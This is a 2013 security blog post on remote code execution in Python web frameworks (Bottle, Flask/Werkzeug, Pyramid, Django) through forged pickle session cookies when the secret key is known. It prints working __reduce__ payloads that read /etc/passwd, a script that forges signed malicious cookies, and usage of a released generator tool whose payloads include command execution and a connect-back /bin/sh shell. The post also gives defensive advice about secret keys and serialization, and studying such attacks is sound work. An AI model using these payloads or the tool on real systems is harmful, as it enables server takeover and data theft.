Python web frameworks and pickles
Published on 23 June 2013
TL;DR Tool is available here pppp.tar.gz
Contents
During the talk Shenril and I made at Nuit du hack , I spoke about ways to exploit various Python web frameworks using pickle as data serializer. In this post, I'll try to present as much information about the way this happens and the ways to exploit it.
Let's get back to the basics :
Pickle
Pickle is a Python module used to serialize data, but contrarily to JSON or YAML, it allows to serialize objects properties but also methods. In most of the cases, this is not a problem, but one can also serialize an object with code in the __reduce__() method, which is called when the object is unpickled.
import pickle
import subprocess
class test(object):
def __reduce__(self):
return (subprocess.check_output, (('cat','/etc/passwd'),))
a = pickle.dumps(test())
print a
"csubprocess\ncheck_output\np0\n((S'cat'\np1\nS'/etc/passwd'\np2\ntp3\ntp4\nRp5\n."
b = pickle.loads(a)
print b
'root:x:0:0:root:/root:/bin/bash\n[...]'
Using this method, it is possible to see the pickled object, but it is also possible to look how pickle internal VM treats each instruction with the pickletools.dis() method
>> pickletools.dis(a)
0: c GLOBAL 'subprocess check_output'
25: p PUT 0
28: ( MARK
29: ( MARK
30: S STRING 'cat'
37: p PUT 1
40: S STRING '/etc/passwd'
55: p PUT 2
58: t TUPLE (MARK at 29)
59: p PUT 3
62: t TUPLE (MARK at 28)
63: p PUT 4
66: R REDUCE
67: p PUT 5
70: . STOP
highest protocol among opcodes = 0
I won't get any further on pickle opcodes, as there is a lot of information already available on the Internet for this :
- Sour pickles @ BlackHat USA 2011
- Sensepost blog 1 2 3
Web frameworks and pickle
Well, several Python web frameworks do provide a way to store session information in cookies that are sent back to the user. Generally, these cookies contain a pickled representation of a list or a dictionary of values stored in the user session. For instance, let's create a small application with the Bottle framework :
from bottle import route, run, response, request, HTTPResponse
@route('/')
def main():
value = request.get_cookie('account', secret='SecretK3y')
if value:
return value
@route('/set')
def set():
resp = HTTPResponse(status=303)
resp.set_header('Location','/')
resp.set_cookie('account', 'Admin', secret='SecretK3y')
return resp
run(host='127.0.0.1', port=8080, debug=True, reloader=True)
This simple application allows to set a cookie when the user gets on the /set route and displays the value content when he gets on /.
Accessing the /set URL, the server responds with the following header :
Set-Cookie: account="!Xgen4B8bNpwWRNltHcfaZQ==?gAJVB2FjY291bnRxAVUFQWRtaW5xAoZxAy4="
To know how this cookie is constructed by Bottle, let's check its source code :
#bottle.py
def cookie_encode(data, key):
''' Encode and sign a pickle-able object. Return a (byte) string '''
msg = base64.b64encode(pickle.dumps(data, -1))
sig = base64.b64encode(hmac.new(tob(key), msg).digest())
return tob('!') + sig + tob('?') + msg
By decoding the last part of the cookie, we can find the way data is stored in it :
>>> import pickle
>>> pickle.loads('gAJVB2FjY291bnRxAVUFQWRtaW5xAoZxAy4='.decode('base64'))
('account', 'Admin')
So the session variables are stored in a tuple. Great ! Now let's force a cookie with the malicious pickle we created before :
import pickle, subprocess, base64, hmac
class test(object):
def __reduce__(self):
return (subprocess.check_output, (('cat','/etc/passwd'),))
p=pickle.dumps(('account',test()))
msg = base64.b64encode(p)
sig = base64.b64encode(hmac.new('SecretK3y', msg).digest())
print '!'+sig+'?'+msg
!IGOy9wZDbDQZU5onzz/5Bg==?KFMnYWNjb3VudCcKcDAKY3N1YnByb2Nlc3MKY2hlY2tfb3V0cHV0CnAxCigoUydjYXQnCnAyClMnL2V0Yy9wYXNzd2QnCnAzCnRwNAp0cDUKUnA2CnRwNwou
Now if we replace the cookie value by what we just generated, and get to the /show page again, the output of the page will be the content of the /etc/passwd file of the server.
Affected web frameworks
Bottle is not the only web framework that uses pickle as a data serializer. Nearly all of them do support it. So far, I've successfully checked and exploited this vulnerability in the following frameworks :
- Bottle, as we saw it
- Werkzeug / Flask
- Pylons / Pyramid
- Django
Flask
Nearly the same as Bottle. The cookie generation code is here :
#contrib/securecookie.py
def serialize(self, expires=None):
"""Serialize the secure cookie into a string.
If expires is provided, the session will be automatically invalidated
after expiration when you unseralize it. This provides better
protection against session cookie theft.
:param expires: an optional expiration date for the cookie (a
:class:`datetime.datetime` object)
"""
if self.secret_key is None:
raise RuntimeError('no secret key defined')
if expires:
self['_expires'] = _date_to_unix(expires)
result = []
mac = hmac(self.secret_key, None, self.hash_method)
for key, value in sorted(self.items()):
result.append('%s=%s' % (
url_quote_plus(key),
self.quote(value)
))
mac.update('|' + result[-1])
return '%s?%s' % (
mac.digest().encode('base64').strip(),
'&'.join(result)
)
Pyramid
Pyramid and Pylons are also affected :
#controllers/util.py
def signed_cookie(self, name, data, secret=None, **kwargs):
"""Save a signed cookie with secret signature
Saves a signed cookie of the pickled data. All other keyword
arguments that ``WebOb.set_cookie`` accepts are usable and
passed to the WebOb set_cookie method after creating the signed
cookie value.
"""
pickled = pickle.dumps(data, pickle.HIGHEST_PROTOCOL)
sig = hmac.new(secret, pickled, sha1).hexdigest()
self.set_cookie(name, sig + base64.standard_b64encode(pickled), **kwargs)
Django
Django is certainly the most interesting one, as it uses pickle with nearly all session management backends.
The faulty code is in contrib/sessions/backend/base.py, in the SessionBase class :
def encode(self, session_dict):
"Returns the given session dictionary pickled and encoded as a string."
pickled = pickle.dumps(session_dict, pickle.HIGHEST_PROTOCOL)
hash = self._hash(pickled)
return base64.b64encode(hash.encode() + b":" + pickled).decode('ascii')
And because all other backends are just subclasses of SessionBase The problem propagates to all of the backends. I only tested two of them at the moment, but the others should work as well :
- django.contrib.sessions.backends.signed_cookies
- django.contrib.sessions.backends.file
For instance, the file-based session backend stores the pickled data as a base64(hmac:base64(pickle)) and by default stores the files in the temp directory as set by a call to tempfile.gettempdir(), which on UNIX systems points to /tmp.
If you happen to also find an arbitrary file upload on the same server, that's good news, because using this, it is possible to upload a session file and use it to execute code.
Secret key considerations
All of these attacks rely on the knowledge of the secret key, which is normally protected by the framework, or at least hidden in the code. However, not all the frameworks are correctly warning developers about this security problem.
Django
There is a big warning about arbitrary code execution if the SECRET_KEY is found.
https://docs.djangoproject.com/en/dev/topics/http/sessions/#using-cookie-based-sessions
Werkzeug
There is a notice about code execution vulnerability in the documentation. Devs also provide a way to change the serialization method to use JSON, which is not vulnerable.
http://werkzeug.pocoo.org/docs/contrib/securecookie/#security
Bottle
No information about the vulnerability is provided in the documentation.
Pyramid
No information about the vulnerability is provided in the documentation.
In practice, a simple search on Github is self-explanatory :
Note that this does not guarantees that all of these applications are vulnerable, but this proves that secret key management is not taken care of seriously.
Exploitation
As it is not that easy to generate a valid cookie or session file, I created a small script that generates valid malicious cookies for all of the aforementioned frameworks.
Its usage is really simple :
$ ./pppp.py -h
usage: pppp.py [-h] [-o {django_cookie,django_file,werkzeug,bottle,raw}]
[-k SECRET_KEY] -p {connect_back,read_file,command_exec} -a
ARGUMENT [-n VAR_NAME] [-m HASH_TYPE]
Generates harmful pickles for various uses (and fun)
optional arguments:
-h, --help show this help message and exit
-o {django_cookie,django_file,werkzeug,bottle,raw}, --output {django_cookie,django_file,werkzeug,bottle,raw}
Pickle output format
-k SECRET_KEY, --key SECRET_KEY
Application's secret key
-p {connect_back,read_file,command_exec}, --payload {connect_back,read_file,command_exec}
Payload type
-a ARGUMENT, --argument ARGUMENT
Payload's argument
-n VAR_NAME, --name VAR_NAME
Var name for the pickled payload
-m HASH_TYPE, --mac HASH_TYPE
(Werkzeug only) specify the hash type
For instance, to generate the malicious pickle in the Bottle example above, just type :
$ ./pppp.py -o bottle -k SecretK3y -p read_file -a /etc/passwd -n account
!OOdDHCo7esKUhSFX5Ivo4w==?KFMnYWNjb3VudCcKY3N1YnByb2Nlc3MKY2hlY2tfb3V0cHV0CigoUydjYXQnClMnL2V0Yy9wYXNzd2QnCmx0UnQu
An other, more self-explaining example, is the connect back shell that can be spawned with the following command :
$ ./pppp.py -o bottle -k SecretK3y -p connect_back -a 127.0.0.1:31337 -n account
The generated pickle will, on execution, connect to 127.0.0.1 on port 31337 and spawn a /bin/sh bound to the socket.
PPPP is available right here : pppp.tar.gz
Conclusion
This attack cannot be used everywhere, but combined with other vulnerabilities like a local file read or by knowing the source code, it becomes possible to run arbitrary code on the server quite easily.
For application developers, be very careful about the secret key used in your application and don't publish it on Github, that's REALLY a bad idea. You can also try to change the serialization method, if it's available in your framework, or use a file- or database-based method if you are sure that there is no possibility to manipulate the session data.